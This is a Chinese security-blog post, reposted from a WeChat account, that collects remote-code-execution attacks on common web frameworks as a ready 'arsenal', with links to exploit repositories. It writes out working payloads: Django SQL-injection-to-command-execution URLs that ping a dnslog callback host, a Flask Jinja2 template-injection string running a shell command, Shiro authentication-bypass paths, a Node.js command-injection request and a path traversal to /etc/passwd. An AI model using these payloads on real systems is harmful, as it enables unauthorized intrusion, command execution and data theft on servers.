常见框架RCE总结

admin 2022年4月30日22:17:28评论185 views字数 4674阅读15分34秒阅读模式

常见框架RCE总结

点击蓝字 关注我们

常见框架RCE总结


声明

本文作者:CKCsec安全研究院
本文字数:1888

阅读时长:7 分钟

项目/链接:文末获取

本文属于【CKCsec安全研究院】原创文章,未经许可禁止转载

常见框架RCE总结

前言

为什么突然跳到这个框架RCE的话题,就现在的安全意识水平,一般都会升级,或者是通报后及时整改修复,框架直接RCE的可能性小之又小,却没成想。。

本篇文章主要分享总结一下常见框架的rce姿势,和一些一键脚本,前人栽树后人乘凉嘛,脚本小子也还挺快乐的不是吗?

本篇文章会在blog及时更新,好比一个仓库,以便师傅们及时查阅。

不废话,直接开水(手动狗头)。

思维导图

常见框架RCE总结


基础知识

中间件及框架列表:

IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flask,jQuery等

1、开发框架-PHP-Laravel-Thinkphp

2、开发框架-Javaweb-St2-Spring

3、开发框架-Python-django-Flask

4、开发框架-Javascript-Node.js-JQuery

5、其他框架-Java-Apache Shiro&Apache Sorl

常见语言开发框架:

PHP:Thinkphp Laravel YII CodeIgniter CakePHP Zend等

JAVA:Spring MyBatis Hibernate Struts2 Springboot等

Python:Django Flask Bottle Turbobars Tornado Web2py等

Javascript:Vue.js Node.js Bootstrap JQuery Angular等

PHP Thinkphp&Laravel

「Laravel」

CVE-2021-3129 RCE

Laravel <= 8.4.2

https://github.com/zhzyker/CVE-2021-3129

https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP

「Thinkphp-3.X RCE-5.X RCE」

ThinkPHP是一套开源的、基于PHP的轻量级Web应用开发框架

Thinkphp专检

https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection

https://github.com/Lotus6/ThinkphpGUI/releases/tag/1.3

PHPUnit 

eval-stdin.php 远程命令执行漏洞 CVE-2017-9841

/phpunit/src/Util/PHP/eval-stdin.php
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host:
Content-Length: 21
Accept-Encoding: gzip

JAVA Spring&Struts2&Shiro&

「Struts2」

武器库-st2专检

「文末获取下载连接」

S2-062 CVE-2021-31805

https://github.com/YanMu2020/s2-062

「Spring」

SpringBoot 相关漏洞学习资料,利用方法和技巧合集

https://github.com/LandGrey/SpringBootVulExploit

SpringBoot

https://github.com/0x727/SpringBootExploit

https://github.com/WhiteHSBG/JNDIExploit

Spring-cloud-function

https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE

Spring_Cloud_Gateway

https://github.com/An0th3r/CVE-2022-22947-exp

Apache Shiro

判断:大多会发生在登录处,返回包里包含remeberMe=deleteMe字段

漏洞:https://avd.aliyun.com/search?q=shiro

Apache Shiro <= 1.2.4 默认密钥致命令执行漏洞  CVE-2016-4483

Apache Shiro < 1.3.2 验证绕过漏洞 CVE-2016-2807

Apache Shiro < 1.4.2 cookie oracle padding漏洞 CVE-2019-12442

Apache Shiro < 1.5.2 验证绕过漏洞 CVE-2020-1957

Apache Shiro < 1.5.3 验证绕过漏洞 CVE-2020-11989

Apahce Shiro < 1.6.0 验证绕过漏洞 CVE-2020-13933

Apahce Shiro < 1.7.1 权限绕过漏洞 CVE-2020-17523

CVE_2016_4437 Shiro-550+Shiro-721

CVE-2020-11989

Poc:

/admin/%20

影响范围:Apache Shiro < 1.7.1

https://github.com/jweny/shiro-cve-2020-17523

CVE-2020-1957

Poc

/xxx/..;/admin/

影响范围:Apache Shiro < 1.5.3

「武器化文末获取」

Apache Solr

Apache Solr Exploits 🌟

https://github.com/Imanfeng/Apache-Solr-RCE#cve-2017-12629

CVE-2019-0193

CVE-2019-0192

CVE-2019-17558

CVE-2017-12629

CVE-2019-12409

CVE-2020-13957

CVE-2018-8026

CVE-2021-27905 Apache Solr 文件读取&SSRF

https://github.com/murataydemir/CVE-2021-27905

Python Django&Flask&MotionEye

「Django」

CVE_2019_14234

单引号已注入成功,SQL语句报错:

/admin/vuln/collection/?detail__a%27b=123

创建cmd_exec:

/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_exec(cmd_output%20text)--%20

调用cmd_exec执行命令:

/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27ping hqrwsz.dnslog.cn%27--%20

CVE-2020-7471

https://github.com/huzaifakhan771/CVE-2020-7471-Django

CVE-2021-35042

目录:

/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@basedir)),1)%23

版本:

/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20version())),1)%23

数据库名:

/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20database())),1)%23

「Flask Jinja2 SSTI」

Flask是一个使用Python编写的轻量级Web应用框架。其WSGI工具箱采用Werkzeug ,模板引擎则使用Jinja2 .

?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__(%22os%22).popen(%22id%22).read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D

「MotionEye」

信息泄露漏洞 CVE-2022-25568

MotionEye <= 0.42.1

/config/list

JavaScript Jquery&Node

「jQuery」

jQuery Upload File <= 4.0.2 中的任意文件上传

curl -F "[email protected]" "url"

XSS payload

https://github.com/mahp/jQuery-with-XSS

「Node.js」

cve_2021_21315

Systeminformation <  5.3.1

https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC

POC

/api/getServices?name[]=$(echo -e 'ckcsec' > test.txt)

cve_2017_14849

GET:

/static/../../../a/../../../../etc/passwd

本文中所有工具已打包,公众号后台回复"框架RCE"获取


另外关注公众号后台回复“0112”可免费获取代码审计教程后台回复“0110”获取红队攻防内部手册。回复“apk11获取apk测试工具集。

下面就是团队的公众号啦,老铁来都来了点波关注叭!

上面教程仅供个人学习交流,旨在为网络安全发展贡献力量,切勿用于非法用途,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

原文始发于微信公众号(CKCsec安全研究院):常见框架RCE总结

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月30日22:17:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   常见框架RCE总结http://cn-sec.com/archives/966479.html

发表评论

匿名网友 填写信息